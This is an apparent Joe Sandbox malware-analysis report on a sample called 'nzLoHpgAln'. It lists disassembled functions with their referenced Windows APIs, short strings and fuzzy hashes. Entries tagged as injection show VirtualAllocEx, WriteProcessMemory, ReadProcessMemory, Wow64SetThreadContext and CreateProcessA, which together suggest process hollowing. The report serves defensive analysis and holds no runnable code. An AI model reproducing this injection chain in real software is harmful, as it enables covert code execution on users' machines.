Source File: 00000000.00000002.1765288253.0000000009C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9c30000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq$lq?
API String ID: 0-1073575558
Opcode ID: c8c146787c708455cfe5b34d0edc6ec770d07d58c048d60e2ed82f1a7d6dd425
Instruction ID: c478e4daed41dfb1eb22e8afd137c940d71c1984debde2f6522cad18ae1e52cd
Opcode Fuzzy Hash: c8c146787c708455cfe5b34d0edc6ec770d07d58c048d60e2ed82f1a7d6dd425
Instruction Fuzzy Hash: DC424874E002188FDF54DFA9D89479EBBF2BF88300F50C169D41AAB395DB349986CB91

Function 09F4C480 Relevance: 4.1, Strings: 3, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|l?, xrefs: 09F4C71F
|l?, xrefs: 09F4C811
pl?, xrefs: 09F4C821

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: pl?$|l?$|l?
API String ID: 0-1766566407
Opcode ID: 1a3fcb8bc2f39e7feb8fd8397683c6ab27b26b6178dbfc63d4141efe79e4199d
Instruction ID: 2a9b9edd59c14869c8ebcf16865a0aca6b9f07dbd0bd5f03c00fed0bb42b4603
Opcode Fuzzy Hash: 1a3fcb8bc2f39e7feb8fd8397683c6ab27b26b6178dbfc63d4141efe79e4199d
Instruction Fuzzy Hash: 24C19D71B027008FEB15DF79C8507AE7BE6AF89704F14956EE286CB290DB35E901CB52

Function 008114D0 Relevance: 4.0, Strings: 3, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 00811729
m4", xrefs: 008116A0
Te^q, xrefs: 00811539

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$m4"
API String ID: 0-3141980679
Opcode ID: 7cb3cc06a4868469507caef9779b9c2e64c7e5ea9abff42d530e425c06fabe93
Instruction ID: ffc44041ff5d6f7793c5f2832c0b41cf91d24514787fc7b365c0b10d7dd5a477
Opcode Fuzzy Hash: 7cb3cc06a4868469507caef9779b9c2e64c7e5ea9abff42d530e425c06fabe93
Instruction Fuzzy Hash: D791E374E006198FCB48CFAAC8846DEFBB6FF89300F24942AD51ABB264D7359945CF54

Function 008107D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 008198BD

Strings

$Hz, xrefs: 008107D4

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: InformationProcessQuery
String ID: $Hz
API String ID: 1778838933-1215654401
Opcode ID: badc0822b56d6016ee56afea179cea6ca6ae9062402da820e03d92eac8e8ff54
Instruction ID: 2fdb1d3c32822b0fd192257d9db3b91f47509764d9705618e0d0dad10a1d4388
Opcode Fuzzy Hash: badc0822b56d6016ee56afea179cea6ca6ae9062402da820e03d92eac8e8ff54
Instruction Fuzzy Hash: 1D4167B8D042589FCB10CFA9D984ADEFBB5FB49310F20A02AE914B7310D375A945CF64

Function 09C32020 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

lq?, xrefs: 09C32069
`>, xrefs: 09C32020

Memory Dump Source

Source File: 00000000.00000002.1765288253.0000000009C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9c30000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: `>$lq?
API String ID: 0-4208163499
Opcode ID: 1a1f84e1b6b285e869fb7ced6366cb65d5696b4d1ce826d1af4364e20a5509b5
Instruction ID: 1ecd68116b1f46d4b4adb5830392fcc4a09d1ba2c66b83e0a00ae8bf30c55fcb
Opcode Fuzzy Hash: 1a1f84e1b6b285e869fb7ced6366cb65d5696b4d1ce826d1af4364e20a5509b5
Instruction Fuzzy Hash: 5BC14771E002189FDF14CFA9D88079DBBB2BF88310F54C1AAE459AB255DB30DA85CF91

Function 008186A9 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

4_z, xrefs: 008186ED

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: 4_z
API String ID: 0-1372605927
Opcode ID: 03a0c379540cc5bb54cd7ef53a46e15ddd772a45025115ddf0a871cc67254b46
Instruction ID: 20477d1f69a05076d69d3837dd57ae2c452e2f0ec69fd858c92c33dae335e5e6
Opcode Fuzzy Hash: 03a0c379540cc5bb54cd7ef53a46e15ddd772a45025115ddf0a871cc67254b46
Instruction Fuzzy Hash: EF710374E0120DEFCB44DFA5D4956EEBBB6FF89304F20882AD416AB294DB345982CF51

Function 00811DA0 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

MIT License; see embedded license description for details., xrefs: 00811E15

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID: MIT License; see embedded license description for details.
API String ID: 0-234374465
Opcode ID: e46388472b5e152a525c98b7d0e655d53e5a251fb5fe180d7c6f331a40c83f91
Instruction ID: e6983aa3cf1d7f30fee50d8b7eafd4e1f5b7881c366a35ab1f005ab95177c2da
Opcode Fuzzy Hash: e46388472b5e152a525c98b7d0e655d53e5a251fb5fe180d7c6f331a40c83f91
Instruction Fuzzy Hash: 505106B0E0520A8FDF08CFAAD9445EEFBF6FF88300F24D16AD515A7254D7349A818B58

Function 00819D28 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 184450463b873b66292a6b5fdb09593a4c4734eb166780beb44f01c21753b01c
Instruction ID: b36f9dbf8415ecb9cdace6cf23b58b1170d1fa198641874f8696c8375386e989
Opcode Fuzzy Hash: 184450463b873b66292a6b5fdb09593a4c4734eb166780beb44f01c21753b01c
Instruction Fuzzy Hash: B4B12370D06218CFDB28DFA4D9906DDBBBAFF89300F208469D05ABB255DB349981CF65

Function 00812820 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d1211f3c00c009449661014dc5ae626b0e255af1f2db67b588033bcb9a4356
Instruction ID: 650dc39fc2763cc3c799f4df1f11a6e4ef389b10760e2cee7cc408935f540878
Opcode Fuzzy Hash: 89d1211f3c00c009449661014dc5ae626b0e255af1f2db67b588033bcb9a4356
Instruction Fuzzy Hash: 01310771E006188FDB18CFAAD8447DEBBB6FFC9310F14C1AAD408AA264DB755A95CF50

Function 09F4AE83 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9fe179cdbff7421eb89cb1ad0973d0028f86d067e32f7daaba7586f6b6064ca
Instruction ID: a751e23c3b4afc2354b8a5b5bb9c7d3f8de0640079dd8d6e78dfbce48cc4791e
Opcode Fuzzy Hash: e9fe179cdbff7421eb89cb1ad0973d0028f86d067e32f7daaba7586f6b6064ca
Instruction Fuzzy Hash: BFD01779C4D198CFC705AF7498446F8BEB9FB1B349F0824A5952AAB252E260C9808B65

Function 048F7842 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 048F78CE
GetCurrentThread.KERNEL32 ref: 048F790B
GetCurrentProcess.KERNEL32 ref: 048F7948
GetCurrentThreadId.KERNEL32 ref: 048F79A1

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e635ab51ea1cf5f40f84b885740161acaa759c3c461d1ad9b7fe1e34eb8ddb22
Instruction ID: ba2d4e0a0c37e003c8fafd99a0796dfb4e0a0037301834d8dd55cbeee76c60aa
Opcode Fuzzy Hash: e635ab51ea1cf5f40f84b885740161acaa759c3c461d1ad9b7fe1e34eb8ddb22
Instruction Fuzzy Hash: D15166B0D013498FEB15DFA9D948B9EBBF1EF48314F208959E509E7290D738A944CF62

Function 048F7850 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 048F78CE
GetCurrentThread.KERNEL32 ref: 048F790B
GetCurrentProcess.KERNEL32 ref: 048F7948
GetCurrentThreadId.KERNEL32 ref: 048F79A1

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cfe60ea7816a0d8a25e3f4ab712274d50d769d08c1b5766a71614fc65b601bd2
Instruction ID: 3f6400ed7567f0042cc0bda996c8724dcd0800472d4afc45da27a7a81b520a0b
Opcode Fuzzy Hash: cfe60ea7816a0d8a25e3f4ab712274d50d769d08c1b5766a71614fc65b601bd2
Instruction Fuzzy Hash: F15167B0D013098FEB14DFA9D948B9EBBF1EF48315F208959E509A7350D738A984CB66

Function 048F5470 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 048F56F2

Strings

@pz, xrefs: 048F5623
@pz, xrefs: 048F55FE

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: HandleModule
String ID: @pz$@pz
API String ID: 4139908857-2701265877
Opcode ID: 5633c9f9b32e32c7b62b0432a7a6711cbdfba3b10c83974c07f66b9edc8b60f8
Instruction ID: 1c3b27d57db9556b7f33e370f6b15769c90c776521eb938aa8a15c67fd094a67
Opcode Fuzzy Hash: 5633c9f9b32e32c7b62b0432a7a6711cbdfba3b10c83974c07f66b9edc8b60f8
Instruction Fuzzy Hash: F09136B0A00B099FDB24CF69D94479ABBF2BF48304F108A2AD54AD7651E774F945CF90

Function 00819914 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNELBASE(?), ref: 0081A302

Strings

$Fz, xrefs: 00819914

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: DebugOutputString
String ID: $Fz
API String ID: 1166629820-3606464399
Opcode ID: fc952f205f73995a990fe7611b5c69232f990f03f5f176d428bc541bb37d96a6
Instruction ID: 83493ac86b103516ea96af6a3885fe8ef4bb484027b7de845b21b0dee698a389
Opcode Fuzzy Hash: fc952f205f73995a990fe7611b5c69232f990f03f5f176d428bc541bb37d96a6
Instruction Fuzzy Hash: C231A7B4D012089FCB14CFA9D584ADEFBF5AF49310F24902AE818B7320D374A985CFA5

Function 008184F0 Relevance: 1.9, APIs: 1, Instructions: 429memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0081864F

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a686a9c4330f0607f43cc42dc587369710d9a981d9f2316f10f27e0a728d3c8a
Instruction ID: 13a781510c0b31f6daf18ec5939ca7ec1511debf2bf803fa7cbbf344bc6128e4
Opcode Fuzzy Hash: a686a9c4330f0607f43cc42dc587369710d9a981d9f2316f10f27e0a728d3c8a
Instruction Fuzzy Hash: DFF1ACB6C08395CFCB428FA4D8555D9BFB8FF22324B1940CEC5809B162E7759C9ACB15

Function 09F4767F Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F4794F

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 324e7b72edd9354407b6ea4a73f6932d50845144043c5f977fdbda91f8afd282
Instruction ID: 72cae93d2537791d9c7a570ec23ce9502ab6535633b653e69a49605cd6e5f85b
Opcode Fuzzy Hash: 324e7b72edd9354407b6ea4a73f6932d50845144043c5f977fdbda91f8afd282
Instruction Fuzzy Hash: 71C12670D002298FDB20DFA8C841BEEBBF1BF49310F1095A9E859B7250DB749A85CF95

Function 09F47688 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F4794F

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2195cf872a4826e910a5719f9275c32b403b738790c59b85e219cba3199478de
Instruction ID: 147242f55aaaebd7ad6b867e435f665293f8db0a1a728c63d5057f2889720350
Opcode Fuzzy Hash: 2195cf872a4826e910a5719f9275c32b403b738790c59b85e219cba3199478de
Instruction Fuzzy Hash: 31C12570D002298FDB20DFA8C845BEEBBF1BF49310F1095A9E859B7250DB749A85CF95

Function 048FC144 Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 048FC311

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 57620d1aab7cec60a84b0de7230ed2fd27d0b901a5a94a1b6370ea1d5515466e
Instruction ID: 506f40a5ab6429465f8fadcf77df4467111acff979be683293860f3f1c5c8c5f
Opcode Fuzzy Hash: 57620d1aab7cec60a84b0de7230ed2fd27d0b901a5a94a1b6370ea1d5515466e
Instruction Fuzzy Hash: C57189B4D00218DFDF60CFA9D984ADEBBF1BB09304F1091AAE958A7211D734AA85CF45

Function 048FC150 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 048FC311

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8b4484b56e162c95d88fa1a6d63ad0b4c7808ceac36b4f05c8f8908b4e23a323
Instruction ID: e5fb0f3e63dc880a636862aed2264f0cdde6379b54abc9d85de27799759dc2ee
Opcode Fuzzy Hash: 8b4484b56e162c95d88fa1a6d63ad0b4c7808ceac36b4f05c8f8908b4e23a323
Instruction Fuzzy Hash: 16717AB4D00218DFDF20CFA9C984ADEBBF1BB09304F1491AAE958A7211D734AA85CF55

Function 09C32A40 Relevance: 1.6, APIs: 1, Instructions: 149windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 09C32B53

Memory Dump Source

Source File: 00000000.00000002.1765288253.0000000009C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9c30000_nzLoHpgAln.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c69694aa1cfa576a27a43c7cabc40eae67245e4a7f790b6ce9e7ee0cf23863e6
Instruction ID: 8805c327977d13d5e55f97dffd8be04cf7f17e703d55fd8762d641c47b695de6
Opcode Fuzzy Hash: c69694aa1cfa576a27a43c7cabc40eae67245e4a7f790b6ce9e7ee0cf23863e6
Instruction Fuzzy Hash: E251DBB5D002589FCF01CFA9D880AEEBFF5EB0A310F14906AE814BB221D335A941CF64

Function 0081E10C Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0081F6B9

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d174c065d0ff01131b7a17cd8cb5aeb811c2f3aa2f50cc2253a791d14f64ddee
Instruction ID: 5d08a0a2531e68b6592ba4af9c2bcca38a7053a5c9a273933211d243afa41195
Opcode Fuzzy Hash: d174c065d0ff01131b7a17cd8cb5aeb811c2f3aa2f50cc2253a791d14f64ddee
Instruction Fuzzy Hash: B251B1B1D002198FDB20DFA8C845BDEBBF5BF49304F1084AAD509BB251DB756A89CF91

Function 09F47300 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F473D3

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8a8f1237642ca4df4695d524a4267f9092a38ebfd8fdb2bb5b3fd08ea489359e
Instruction ID: e720c5fe4c0c71b57203a47404411a75d2970dbb23b3bd1508d44e82b56be4c2
Opcode Fuzzy Hash: 8a8f1237642ca4df4695d524a4267f9092a38ebfd8fdb2bb5b3fd08ea489359e
Instruction Fuzzy Hash: E8419AB5D012589FCF00DFA9D984AEEFBF1BB49310F20902AE819B7250D739AA45CF54

Function 09F472FC Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F473D3

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b72f6ddff3c89861bfe581b060a57e7f8e3f81b4426b1c11b5e0d6b9e8e0d996
Instruction ID: 03b2fdf8fbf0b03647b145f75f72b65e584e386a9a7d8105218b4e0bdbb317ab
Opcode Fuzzy Hash: b72f6ddff3c89861bfe581b060a57e7f8e3f81b4426b1c11b5e0d6b9e8e0d996
Instruction Fuzzy Hash: 4D4199B5D012589FCB00DFA9D984AEEFBF1BB49310F20902AE819B7250D739AA45CF54

Function 048F7A90 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 048F7B63

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 60cd399403e47f215ef58946fe426e51dc3f86201b5d626058d2bfaab45d2ad5
Instruction ID: c53881f4455ae9120989d8b59f4dce7ada5052fc98f238c96d234491e6406605
Opcode Fuzzy Hash: 60cd399403e47f215ef58946fe426e51dc3f86201b5d626058d2bfaab45d2ad5
Instruction Fuzzy Hash: BA4186B9D002589FDB00CFA9D984ADEBBF5FB09310F14906AE918AB311D335A945CF94

Function 048F7A98 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 048F7B63

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 874c095543943512043378ec1741c29d3f55137e2839d6b3dba3d06316fbf341
Instruction ID: 1dd6ab0b151203fe8f33f59232090e98a49c7e7be746980b8c902a9af01d8bb9
Opcode Fuzzy Hash: 874c095543943512043378ec1741c29d3f55137e2839d6b3dba3d06316fbf341
Instruction Fuzzy Hash: 394164B9D002589FDB00CFA9D984ADEBBF5BB09310F14906AE918BB310D335A955DF94

Function 09F47457 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F4750A

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4a2ef100d90ebf1ce6c0293c190b3340ffae9121f6c1da40fe0b59fe36c41577
Instruction ID: 44131f33429f11f0f2bbf650ef6bb873a05ed223197af19375641081c61a2f36
Opcode Fuzzy Hash: 4a2ef100d90ebf1ce6c0293c190b3340ffae9121f6c1da40fe0b59fe36c41577
Instruction Fuzzy Hash: 0F41A9B5D002589FCF10DFA9D884AEEFBB1FB49310F10942AE819B7240D735A945CF64

Function 09F47458 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F4750A

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d3ade226577c936305ab1676234524524f35bdb55bd063f592eff2ca86f9068c
Instruction ID: 4f75f5b8fff9714d6902e8e1b16cf5c7a2d09721e4cd8f5b6ef0b6859be1ea09
Opcode Fuzzy Hash: d3ade226577c936305ab1676234524524f35bdb55bd063f592eff2ca86f9068c
Instruction Fuzzy Hash: 274199B5D042589FCF10DFAAD884AEEFBB1FB49310F10942AE819B7240D735A945CF68

Function 09F471DC Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F4728A

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cdac43949f10012ce31419b5978574bd3bf31ba0ed9deaa86f889ee0570fa005
Instruction ID: 81a173aa8a22434cf49ed0684cf91405835480e2911ccf91be5c6f4361d6fb8c
Opcode Fuzzy Hash: cdac43949f10012ce31419b5978574bd3bf31ba0ed9deaa86f889ee0570fa005
Instruction Fuzzy Hash: C63198B8D052589FCF10DFA9D884ADEFBB1FB49310F10A02AE815B7250D735A945CF54

Function 09F471E0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F4728A

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f13f1a443c8ed28e91651b9ecf144961c3b1d295df9d9971b4eca14e6c0f44d
Instruction ID: 79db26757984dd542d47761cdcbf8d6bbbda8f6cf4cb55efec49e4a346422fb3
Opcode Fuzzy Hash: 5f13f1a443c8ed28e91651b9ecf144961c3b1d295df9d9971b4eca14e6c0f44d
Instruction Fuzzy Hash: BD3197B8D012589FCF10DFA9D884ADEFBB1FB49310F10A02AE815B7200D735A945CF68

Function 048FAFE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 048FE981

Memory Dump Source

Source File: 00000000.00000002.1761070461.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48f0000_nzLoHpgAln.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bf2a8543379fd4c5da338f89d3e50ec1834c50c2466cb53f0dddb71fb8525590
Instruction ID: acf7c286201bc53f26edc22b7905bfc9500bede3234208f0ed2c1c9e04abe2d7
Opcode Fuzzy Hash: bf2a8543379fd4c5da338f89d3e50ec1834c50c2466cb53f0dddb71fb8525590
Instruction Fuzzy Hash: A2413AB4A00309CFCB54DF99C888AAABBF5FF88314F24C959D559A7321D774A845CFA0

Function 09F470B0 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 09F47167

Memory Dump Source

Source File: 00000000.00000002.1765557229.0000000009F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f40000_nzLoHpgAln.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0c5851331f61d821c5c2b94e0178b3b159a6a59e8ca256279fe110653379680d
Instruction ID: c5c1c0bdfd016442588db59404a614d8a3d861f36b66c341fae935e5fa523c2f
Opcode Fuzzy Hash: 0c5851331f61d821c5c2b94e0178b3b159a6a59e8ca256279fe110653379680d
Instruction Fuzzy Hash: AB41BAB4D002589FCB14DFA9D885AEEBFF1BB89310F24902AE419B7250D738A945CF94

Function 008185A8 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0081864F

Memory Dump Source

Source File: 00000000.00000002.1750591673.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_nzLoHpgAln.jbxd

Similarity

API ID: ProtectVirtual
String ID:
